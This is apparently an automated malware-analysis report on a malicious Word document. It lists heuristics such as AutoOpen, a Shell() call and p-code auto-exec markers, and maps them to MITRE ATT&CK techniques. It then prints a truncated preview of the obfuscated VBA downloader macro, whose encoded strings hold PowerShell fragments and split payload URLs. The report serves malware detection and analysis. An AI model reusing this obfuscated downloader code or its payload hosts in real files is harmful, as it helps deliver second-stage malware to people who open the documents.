MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses the AutoOpen function and a Shell() call, indicating an attempt to execute arbitrary code upon opening. The obfuscated script likely downloads and executes a second-stage payload, a common technique for malware delivery.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27067 bytes |
SHA-256: 194499383e14c4b3c94bca54abdec7694cf006c834b1b70e6773fe5720cd3733 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "oiLzYpNSzvv"
Function HiErZtOzlSK()
On Error Resume Next
Utwpfpf = 2707257 / CLng(OdsRjj) - 419145 * Cos(8448366) + ItOhjEw + 4206164
qCbaw = 3369886 / CLng(ikJLaZds) - 2582545 * Cos(8540593) + JYzDl + 1419755
WlqiwKR = 9483138 / CLng(TJtCkPY) - 6898410 * Cos(76910) + SFucR + 6871388
hJjwiVXzO = (vuzXSwioWBQuh) + HJjkJKD("zaVKhLtwwzKDwij'+'m2OadFJ1R+J1RIi6R+i6Rfi6J1R+J1RR+i6J1R+J1RRm2i6J1R+J1'+'RR+i6'+'R'+'leeoi6R'+'+i6RWi6R+J1R+J1RiXLe+DdUGOvD", 16, 102)
TNfqRP = 7913339 / CLng(nvmHjGQjjq) - 5952137 * Cos(3999689) + VEDaQDV + 4258608
EKUwEp = 1055524 / CLng(GmiLwpfVQ) - 675328 * Cos(5606115) + tMDSP + 9673022
hisAa = 9608614 / CLng(GTnkkjiw) - 6124616 * Cos(9661651) + GiajUCuR + 8241360
mwfaSH = (VOiwwwIwGkhZwB) + HJjkJKD("pRLvlmowhvXzOcAHDRjSAdHSwUnwTdiIBjC);breai6R+i6Rk;}'+'ci6R+i6Ratch{}i6R+i6R}i6R).rePlace(([cHAR]54+[cHAR]109+XLADzJ", 35, 77)
ZkMYM = 7508253 / CLng(taSKjpSjWRTjiQ) - 3944797 * Cos(6369036) + QlFWAQ + 3987685
rmrzoQGihnl = 7729798 / CLng(hKwivLtWIT) - 9684286 * Cos(6161280) + fvhNCsJo + 6570761
szRZiTnzjK = 3790991 / CLng(RWchcsKwWEHIn) - 7715217 * Cos(4375620) + nMHAib + 9298238
LWFhUQd = (qWwoXYnO) + HJjkJKD("kslUTMjjbMUuiEDaIbktEl'+'6mi6R+i6RJ1R+'+'J1RQi6R+i6Rn6'+'mQ+6i6R+i6RmJJE", 23, 48)
tQdKNIzFla = 4675349 / CLng(uZfkWcaSHpZW) - 4515578 * Cos(7591467) + zVsRIS + 6349181
HYFMG = 4377501 / CLng(YbSrriRjhWuNhs) - 1490164 * Cos(2083818) + XzbzMoGKM + 5938590
wkcOjT = 3280486 / CLng(QUNCiMuKjbYYto) - 113837 * Cos(8578529) + PdkGjuhvwLnLh + 6065122
FFMQRiaHvac = (zqGRYjLtPJAJP) + HJjkJKD("PSWDjiXUijsOPzNrdwiVLji6RJ1R+J1R+i6RLVzFkkriWUOwXSPNJ", 23, 14)
wjvIzklTz = 1089813 / CLng(nNRwBjrjZ) - 5974328 * Cos(1416878) + BHwBvVXLXwK + 6438554
TOqWzNf = 3122539 / CLng(XFuwHstnAwPjBU) - 8183475 * Cos(7055440) + CDPiFCnAFf + 8928354
pIRPJa = 133972 / CLng(CkjEIlmaXOqN) - 1335398 * Cos(9976658) + MTDUmWHiASRD + 1263467
jKiaBTCH = (zfNApvaD) + HJjkJKD("wZKUScJIlDi6R+i6'+'RCi6R+i6RX){i6R+i6Rtri6R+i6Ry{36ZYJ1R+J1RYU.i6R+i6ReoWDofm2WnlfoIMcpRQfZqkiNrfAWlUQcwfjvhchu", 10, 73)
SaKuIcNvt = 6123629 / CLng(rijcUBrbvEHJ) - 4134544 * Cos(8524662) + oVcpaBSA + 1060758
fSwEGHuSJ = 2225559 / CLng(lYYsAYXM) - 3846742 * Cos(4323596) + ZKmhqDwt + 5653878
aiZvi = 3128240 / CLng(JZzSQEkYhaQ) - 721326 * Cos(3147657) + CDEimJYt + 4400907
wQiaUo = (ZRzCBnlbZOSvG) + HJjkJKD("zGDODtvm1R+J1RQe6mi6R+i6RQ+6mQw-oi6R+i6RbJ1R+J1Rji6R+i6J1R+J1RReci6R+i6R6i6R+i6RmQ+XLe+XLe6mQt6i6R+i6Rmi6R+i6RQi6J1R+J1RR+i'+'6RJ1R+J1R) randoi6R+i6RnP", 9, 141)
iHTkVEijUN = 2800321 / CLng(ztLqGLQCAANL) - 4707174 * Cos(1797350) + OiDOEDHWaUh + 5582015
tVIUGjBqj = 912120 / CLng(nKjiYPIArtr) - 9675900 * Cos(9370712) + huGDlJcaDHKks + 4411465
alObppiwP = 7021688 / CLng(ZhLWMpjjA) - 8840834 * Cos(4394294) + qJXFGNp + 6136611
RwpSuJ = (ScvorIHW) + HJjkJKD("NPZkSsiv+'+i6R 36Zi6R+i6RSiXLe+XLe6RXLe+XLe+i6RDJ1R+J1Ri6R+i6RCXLe+XLe)XLe+XLe;&(JNXSDjsISF", 9, 74)
KNaQcC = 8289994 / CLng(aDrmOju) - 7093035 * Cos(913226) + fhEHwqQTzj + 1460068
ScIfHt = 2351500 / CLng(WlzUpNT) - 6268048 * Cos(6036046) + RnazJpiMoPKsEL + 2725983
rPjJk = 4496344 / CLng(WGiIGNqV) - 209666 * Cos(3193325) + EWlzzim + 3806049
hDJwFZOKjP = (nXlQVTJmZh) + HJjkJKD("YuEbhOYNntckJECDitaLeAR]87),[stRInG]['+'cHXLe+XLeJ1R+J1RAR]34) u4d & ( JwxshElLId[1]+JwxSHeLLId'+tcmkzTtXdDwFzwz", 20, 78)
sltEsiUr = 1618742 / CLng(PHRiNsVYu) - 207658 * Cos(5085008) + cNlmRnqU + 5875073
EwhzP = 1542302 / CLng(boXCsbtmNwFF) - 2927456 * Cos(458913) + pmKNMRVh + 9567924
fFCJEjrijH = 6722082 / CLng(YIvnn) - 8822870 * Cos(1477520) + ppppdzAO + 2412229
jjDwwq = (mGSvzawqLajd) + HJjkJKD("RzMjiBfdCBpOWq+J1XLe+XLe'+'Ri6Rbi6R+i6RF/?htti6R+i6RpXLe+XLe://38i6R+i6R'+'pol.i'+'6R+i6Rri6R+i6R'+'u/i6R+i6R37wTrAY/?htt'+'XLe+XLep:/i6R+i6R/J1R+J1Ri6R'+'+i6Rtrans-imi6RMENSGSY", 15, 156)
sscXCT = 8285831
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.